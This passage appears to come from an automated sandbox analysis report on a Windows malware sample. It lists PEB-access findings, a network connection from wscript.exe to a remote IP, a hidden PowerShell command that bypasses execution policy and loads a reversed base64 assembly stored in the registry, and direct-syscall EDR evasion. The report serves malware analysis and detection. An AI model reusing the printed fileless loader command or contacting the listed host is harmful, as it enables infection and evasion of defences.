Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0540A118 mov eax, dword ptr fs:[00000030h]	13_2_0540A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0540A118 mov eax, dword ptr fs:[00000030h]	13_2_0540A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05366154 mov eax, dword ptr fs:[00000030h]	13_2_05366154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05366154 mov eax, dword ptr fs:[00000030h]	13_2_05366154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535C156 mov eax, dword ptr fs:[00000030h]	13_2_0535C156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05367152 mov eax, dword ptr fs:[00000030h]	13_2_05367152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053F8158 mov eax, dword ptr fs:[00000030h]	13_2_053F8158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053F4144 mov eax, dword ptr fs:[00000030h]	13_2_053F4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053F4144 mov eax, dword ptr fs:[00000030h]	13_2_053F4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053F4144 mov ecx, dword ptr fs:[00000030h]	13_2_053F4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053F4144 mov eax, dword ptr fs:[00000030h]	13_2_053F4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053F4144 mov eax, dword ptr fs:[00000030h]	13_2_053F4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05359148 mov eax, dword ptr fs:[00000030h]	13_2_05359148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05359148 mov eax, dword ptr fs:[00000030h]	13_2_05359148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05359148 mov eax, dword ptr fs:[00000030h]	13_2_05359148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05359148 mov eax, dword ptr fs:[00000030h]	13_2_05359148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_054261C3 mov eax, dword ptr fs:[00000030h]	13_2_054261C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_054261C3 mov eax, dword ptr fs:[00000030h]	13_2_054261C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0537B1B0 mov eax, dword ptr fs:[00000030h]	13_2_0537B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_054351CB mov eax, dword ptr fs:[00000030h]	13_2_054351CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053E019F mov eax, dword ptr fs:[00000030h]	13_2_053E019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053E019F mov eax, dword ptr fs:[00000030h]	13_2_053E019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053E019F mov eax, dword ptr fs:[00000030h]	13_2_053E019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053E019F mov eax, dword ptr fs:[00000030h]	13_2_053E019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535A197 mov eax, dword ptr fs:[00000030h]	13_2_0535A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535A197 mov eax, dword ptr fs:[00000030h]	13_2_0535A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535A197 mov eax, dword ptr fs:[00000030h]	13_2_0535A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_054361E5 mov eax, dword ptr fs:[00000030h]	13_2_054361E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053B7190 mov eax, dword ptr fs:[00000030h]	13_2_053B7190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_054071F9 mov esi, dword ptr fs:[00000030h]	13_2_054071F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053A0185 mov eax, dword ptr fs:[00000030h]	13_2_053A0185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053901F8 mov eax, dword ptr fs:[00000030h]	13_2_053901F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0541C188 mov eax, dword ptr fs:[00000030h]	13_2_0541C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0541C188 mov eax, dword ptr fs:[00000030h]	13_2_0541C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053851EF mov eax, dword ptr fs:[00000030h]	13_2_053851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053851EF mov eax, dword ptr fs:[00000030h]	13_2_053851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053851EF mov eax, dword ptr fs:[00000030h]	13_2_053851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053851EF mov eax, dword ptr fs:[00000030h]	13_2_053851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053851EF mov eax, dword ptr fs:[00000030h]	13_2_053851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053851EF mov eax, dword ptr fs:[00000030h]	13_2_053851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053851EF mov eax, dword ptr fs:[00000030h]	13_2_053851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053851EF mov eax, dword ptr fs:[00000030h]	13_2_053851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053851EF mov eax, dword ptr fs:[00000030h]	13_2_053851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053851EF mov eax, dword ptr fs:[00000030h]	13_2_053851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053851EF mov eax, dword ptr fs:[00000030h]	13_2_053851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053851EF mov eax, dword ptr fs:[00000030h]	13_2_053851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053851EF mov eax, dword ptr fs:[00000030h]	13_2_053851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053651ED mov eax, dword ptr fs:[00000030h]	13_2_053651ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_054111A4 mov eax, dword ptr fs:[00000030h]	13_2_054111A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_054111A4 mov eax, dword ptr fs:[00000030h]	13_2_054111A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_054111A4 mov eax, dword ptr fs:[00000030h]	13_2_054111A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_054111A4 mov eax, dword ptr fs:[00000030h]	13_2_054111A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0539D1D0 mov eax, dword ptr fs:[00000030h]	13_2_0539D1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0539D1D0 mov ecx, dword ptr fs:[00000030h]	13_2_0539D1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053DE1D0 mov eax, dword ptr fs:[00000030h]	13_2_053DE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053DE1D0 mov eax, dword ptr fs:[00000030h]	13_2_053DE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053DE1D0 mov ecx, dword ptr fs:[00000030h]	13_2_053DE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053DE1D0 mov eax, dword ptr fs:[00000030h]	13_2_053DE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053DE1D0 mov eax, dword ptr fs:[00000030h]	13_2_053DE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535A020 mov eax, dword ptr fs:[00000030h]	13_2_0535A020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535C020 mov eax, dword ptr fs:[00000030h]	13_2_0535C020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0540705E mov ebx, dword ptr fs:[00000030h]	13_2_0540705E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0540705E mov eax, dword ptr fs:[00000030h]	13_2_0540705E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0537E016 mov eax, dword ptr fs:[00000030h]	13_2_0537E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0537E016 mov eax, dword ptr fs:[00000030h]	13_2_0537E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0537E016 mov eax, dword ptr fs:[00000030h]	13_2_0537E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0537E016 mov eax, dword ptr fs:[00000030h]	13_2_0537E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05435060 mov eax, dword ptr fs:[00000030h]	13_2_05435060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053E4000 mov ecx, dword ptr fs:[00000030h]	13_2_053E4000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05371070 mov eax, dword ptr fs:[00000030h]	13_2_05371070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05371070 mov ecx, dword ptr fs:[00000030h]	13_2_05371070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05371070 mov eax, dword ptr fs:[00000030h]	13_2_05371070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05371070 mov eax, dword ptr fs:[00000030h]	13_2_05371070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05371070 mov eax, dword ptr fs:[00000030h]	13_2_05371070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05371070 mov eax, dword ptr fs:[00000030h]	13_2_05371070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05371070 mov eax, dword ptr fs:[00000030h]	13_2_05371070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05371070 mov eax, dword ptr fs:[00000030h]	13_2_05371070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05371070 mov eax, dword ptr fs:[00000030h]	13_2_05371070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05371070 mov eax, dword ptr fs:[00000030h]	13_2_05371070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05371070 mov eax, dword ptr fs:[00000030h]	13_2_05371070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05371070 mov eax, dword ptr fs:[00000030h]	13_2_05371070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05371070 mov eax, dword ptr fs:[00000030h]	13_2_05371070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0538C073 mov eax, dword ptr fs:[00000030h]	13_2_0538C073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053DD070 mov ecx, dword ptr fs:[00000030h]	13_2_053DD070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053E106E mov eax, dword ptr fs:[00000030h]	13_2_053E106E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05362050 mov eax, dword ptr fs:[00000030h]	13_2_05362050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0538B052 mov eax, dword ptr fs:[00000030h]	13_2_0538B052
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053E6050 mov eax, dword ptr fs:[00000030h]	13_2_053E6050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0542903E mov eax, dword ptr fs:[00000030h]	13_2_0542903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0542903E mov eax, dword ptr fs:[00000030h]	13_2_0542903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0542903E mov eax, dword ptr fs:[00000030h]	13_2_0542903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0542903E mov eax, dword ptr fs:[00000030h]	13_2_0542903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053F80A8 mov eax, dword ptr fs:[00000030h]	13_2_053F80A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_054350D9 mov eax, dword ptr fs:[00000030h]	13_2_054350D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05365096 mov eax, dword ptr fs:[00000030h]	13_2_05365096
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0539909C mov eax, dword ptr fs:[00000030h]	13_2_0539909C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0538D090 mov eax, dword ptr fs:[00000030h]	13_2_0538D090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0538D090 mov eax, dword ptr fs:[00000030h]	13_2_0538D090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535D08D mov eax, dword ptr fs:[00000030h]	13_2_0535D08D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0536208A mov eax, dword ptr fs:[00000030h]	13_2_0536208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535C0F0 mov eax, dword ptr fs:[00000030h]	13_2_0535C0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053A20F0 mov ecx, dword ptr fs:[00000030h]	13_2_053A20F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535A0E3 mov ecx, dword ptr fs:[00000030h]	13_2_0535A0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053850E4 mov eax, dword ptr fs:[00000030h]	13_2_053850E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053850E4 mov ecx, dword ptr fs:[00000030h]	13_2_053850E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053E60E0 mov eax, dword ptr fs:[00000030h]	13_2_053E60E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053680E9 mov eax, dword ptr fs:[00000030h]	13_2_053680E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053E20DE mov eax, dword ptr fs:[00000030h]	13_2_053E20DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053890DB mov eax, dword ptr fs:[00000030h]	13_2_053890DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053770C0 mov eax, dword ptr fs:[00000030h]	13_2_053770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053770C0 mov ecx, dword ptr fs:[00000030h]	13_2_053770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053770C0 mov ecx, dword ptr fs:[00000030h]	13_2_053770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053770C0 mov eax, dword ptr fs:[00000030h]	13_2_053770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053770C0 mov ecx, dword ptr fs:[00000030h]	13_2_053770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053770C0 mov ecx, dword ptr fs:[00000030h]	13_2_053770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053770C0 mov eax, dword ptr fs:[00000030h]	13_2_053770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053770C0 mov eax, dword ptr fs:[00000030h]	13_2_053770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053770C0 mov eax, dword ptr fs:[00000030h]	13_2_053770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053770C0 mov eax, dword ptr fs:[00000030h]	13_2_053770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053770C0 mov eax, dword ptr fs:[00000030h]	13_2_053770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053770C0 mov eax, dword ptr fs:[00000030h]	13_2_053770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053770C0 mov eax, dword ptr fs:[00000030h]	13_2_053770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053770C0 mov eax, dword ptr fs:[00000030h]	13_2_053770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053770C0 mov eax, dword ptr fs:[00000030h]	13_2_053770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053770C0 mov eax, dword ptr fs:[00000030h]	13_2_053770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053770C0 mov eax, dword ptr fs:[00000030h]	13_2_053770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053770C0 mov eax, dword ptr fs:[00000030h]	13_2_053770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_054260B8 mov eax, dword ptr fs:[00000030h]	13_2_054260B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_054260B8 mov ecx, dword ptr fs:[00000030h]	13_2_054260B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053DD0C0 mov eax, dword ptr fs:[00000030h]	13_2_053DD0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053DD0C0 mov eax, dword ptr fs:[00000030h]	13_2_053DD0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05435341 mov eax, dword ptr fs:[00000030h]	13_2_05435341
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05357330 mov eax, dword ptr fs:[00000030h]	13_2_05357330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0542A352 mov eax, dword ptr fs:[00000030h]	13_2_0542A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0538F32A mov eax, dword ptr fs:[00000030h]	13_2_0538F32A

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe

Network Connect: 144.91.92.251 80

Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	NtQuerySystemInformation: Direct from: 0x772748CC	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	NtQueryVolumeInformationFile: Direct from: 0x77272F2C	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	NtOpenSection: Direct from: 0x77272E0C	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	NtClose: Direct from: 0x77272B6C
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	NtCreateKey: Direct from: 0x77272C6C	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	NtReadVirtualMemory: Direct from: 0x77272E8C	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	NtSetInformationThread: Direct from: 0x77272B4C	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	NtQueryAttributesFile: Direct from: 0x77272E6C	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	NtAllocateVirtualMemory: Direct from: 0x772748EC	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	NtQueryInformationToken: Direct from: 0x77272CAC	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	NtTerminateThread: Direct from: 0x77272FCC	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	NtOpenKeyEx: Direct from: 0x77272B9C	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	NtDeviceIoControlFile: Direct from: 0x77272AEC	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	NtAllocateVirtualMemory: Direct from: 0x77272BEC	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	NtProtectVirtualMemory: Direct from: 0x77267B2E	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	NtCreateFile: Direct from: 0x77272FEC	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	NtOpenFile: Direct from: 0x77272DCC	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	NtWriteVirtualMemory: Direct from: 0x77272E3C	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	NtMapViewOfSection: Direct from: 0x77272D1C	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	NtResumeThread: Direct from: 0x772736AC	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	NtProtectVirtualMemory: Direct from: 0x77272F9C	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	NtSetInformationProcess: Direct from: 0x77272C5C	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	NtNotifyChangeKey: Direct from: 0x77273C2C	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	NtCreateMutant: Direct from: 0x772735CC	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	NtSetInformationThread: Direct from: 0x772663F9	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	NtQueryInformationProcess: Direct from: 0x77272C26	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	NtResumeThread: Direct from: 0x77272FBC	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	NtCreateUserProcess: Direct from: 0x7727371C	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	NtWriteVirtualMemory: Direct from: 0x7727490C	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	NtAllocateVirtualMemory: Direct from: 0x77273C9C	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	NtAllocateVirtualMemory: Direct from: 0x77272BFC	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	NtReadFile: Direct from: 0x77272ADC	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	NtQuerySystemInformation: Direct from: 0x77272DFC	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	NtDelayExecution: Direct from: 0x77272DDC	Jump to behavior

Injects a PE file into a foreign processes

